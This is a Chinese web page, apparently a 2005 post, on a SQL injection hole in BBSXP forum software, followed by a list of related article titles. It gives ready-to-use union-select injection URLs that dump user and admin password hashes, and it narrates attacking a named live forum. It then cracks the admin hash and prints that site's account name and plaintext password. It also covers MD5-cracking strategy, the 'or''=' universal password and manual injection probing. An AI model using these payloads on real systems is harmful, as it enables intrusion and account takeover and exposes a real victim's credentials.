BBSXP最新漏洞

漏洞日期:2005年7月1日
受害版本:目前所有BBSXP
漏洞利用:
查前台密码注入语句:
blog.asp?id=1%20union%20select%201,1,userpass,username,1,1,1%20from%20[user]%20where%20membercode=5
查后台密码注入语句:
blog.asp?id=1%20union%20select%201,1,adminpassword,username,1,1,1%20from%20[user]%20where%20membercode=5

首先打开www.google.com在输入Po......bBsxp5.15有很多这样的论坛,随便点个,好就这个bbs.yuntea.com 真幸运,这个站还没打上补丁,一口做气杀到底,bbsxp5.15最新漏洞 
漏洞主要出在BLOG.ASP 可以让直接构造数据库命令  
blog.asp?id=1%20union%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
后台区长的md5密码就显示出来了。 
前台密码也可以出来, 
网上已经有相关动画,软件。 
就利用这个漏洞,肯定有一批bbsxp的网站要倒下了 
接下来就是讲工具了,准备好MD5密码破解器 
关于md5的破解,比较好使的有md5cracker速度增强版。 
1。先用8位或9位数字跑。很快。 
2。如果不行,用小写字母跑。选择5-6位比较好。 
3。再不行,说明密码可能使字母加数字,可以碰碰运气。可以配置一个精品自典,比如10G的, 
   跑上及几个小时。(你的机器配置必须很好) 
4。再不行,建议放弃,太变态了。 
前台ok...后台密码..(注:你必须知道管理员的帐号) 
直接默认的配置就是直接拿下后台密码... 
直接吧前台md5密码暴出来。 
剩下的事就事破解md5了。 
现在开始进行工作了,在http://bbs.yuntea.com/+bl......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
就成了http://bbs.yuntea.com/blo......ion%20select%20top%201%201,[adminpassword],1,1,1,1,1%20from%20[clubconfig] 
他的密码是7CB2BE65EB9F215215A0725A10B6E39E可能前台的密码和后台一样,如果有2个加密密码那就是代表1个是前台的一个是后台的,不多说了,看操作 
按照上面工具的介绍先用数字把, 
正在破===耐心等等 
我接条信息,大家不介意把~ 
出来了,密码是82246124,登入,,他的帐号是wzwu,密码82246124,登入成功,后台登入,密码82246124,登入成功,下面的因该知道把,我也就不多说了,以免遭到人家的痛骂。 
bBsxp5.15最新漏洞的原始作者不清

74D2710BD75C06A057E842C8CA55C576

名'or''='密码也是'or''='
 '
一般ASP系统都有类似下面的URL:http://www.xxx.com/xxx.ASP?ID=××,我们只往在这样的URL后加上一个单引号,如果返回服务器错误信息,那么就说明了程序并没有过滤单引号,而且从返回的错误信息中的了可以得到服务器的一些相关配置信息。接着接交http:/www.xxx.com/xxx.asp?id=××
      and 1=1、http:/www.xxx.com/xx.asp?id=×× and
      1=2,如果返回的页面不一样,说明页面可以注入。

BBSXP最新漏洞 简单注入检测 万能密码相关推荐

  1. BBSXP最新漏洞 简单注入检測 万能password

    BBSXP最新漏洞 漏洞日期:2005年7月1日 受害版本号:眼下全部BBSXP 漏洞利用: 查前台password注入语句: blog.asp?id=1%20union%20select%201,1 ...

  2. SQL手工注入原理万能密码及默认密码登陆后台

    SQL手工注入原理: 下面就是比较笨的方法了==    一个一个试 (* ̄rǒ ̄) 针对于.asp后缀网 + ?id_  在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点 一.什么是SQL ...

  3. mysql登录框万能密码_Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]...

    在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可以 ...

  4. sql注入之万能密码总结

    万能密码 万能密码原理 原验证登陆语句: SELECT * FROM admin WHERE Username= '".$username."' AND Password= '&q ...

  5. SQL注入与万能密码登录

    今天的靶机是一个主要面向web应用程序的框架.更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入.我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜 ...

  6. php密码注入,php防止sql注入之万能密码以及防范

    说什么叫sql注入呢? 就是在登录.注册.input中输入一些影响sql语句的代码 导致你的sql语句出现问题,比如说这个问题: select * from web_manage where user ...

  7. 1039家校通 万能密码绕过 CNVD-2020-31494

    1039家校通 万能密码绕过 CNVD-2020-31494 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X041 万能密码登陆 ...

  8. PHP代码审计入门-万能密码入门分析

    0x00  写在前面 从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有简单的html基础和php基础,跟随流沙前 ...

  9. Mysql漏洞注入——万能密码

    web渗透指南教学竞赛靶场 进入资源后台管理,如图所示: 输入任意账号密码,出现弹窗提醒,如图所示: 在用户名处输入用户名如下代码块,填入任意密码,如图所示(万能密码): admin' or 1=1- ...

最新文章

  1. 公司内部 action调用持久层规范
  2. 设计模式之外观模式学习笔记
  3. Ubuntu利用Samba映射磁盘到Windows(转)
  4. 设备翻转时viewController调用的方法
  5. 我国火力发电站的大脑用上了国产系统
  6. Spring boot(六):如何优雅的使用mybatis
  7. Pyomo 优化建模
  8. MOGRE学习(三) Mogre的SceneNode及Entity
  9. ssrs批量权限管理_管理SSRS安全性并使用PowerShell自动化脚本
  10. webpack跨域问题记录
  11. nodejs在自然语言处理中的一些小应用
  12. 基于springboot+vue的旅游信息(旅游线路)网站(前后端分离)
  13. AbstractQueuedSynchronizer简单理解及介绍
  14. 十六、邮件发送 --【转发】本地安装易邮邮箱服务器并用foxmail 连接测试(一)
  15. Nmap端口扫描windows版
  16. 银行争夺又一万亿市场:汽车金融
  17. Geek 极客大挑战2021 web
  18. 上上下下左右左右BA
  19. 服务器两个内存为何只显示4g_win10系统插入2个4G内存条却只显示4G的解决方法
  20. Vue项目玩转Ueditor(百度富文本编辑器),解决图片需要上传服务器的问题,将图片转存base64字符串。

热门文章

  1. 位置注意力和通道注意力机制
  2. 树莓派Odroid等卡片式电脑上搭建NAS教程系列1-Ubuntu系统安装
  3. Air系列4G模块AT版本MQTT应用说明
  4. A-Level Music课程适合哪些人学习?
  5. 《IAR添加文件夹和头文件的方法》
  6. python列表乘法运算_Python列表基本运算和元组
  7. 搭建私有yum源仓库同步阿里云yum源到本地私有yum仓库
  8. java 正则替换cdata_替换xml中的cdata标记
  9. 第一个程序(python)-HelloWorld
  10. 服务器数据库怎么导入数据库文件路径,服务器数据库导入sql文件路径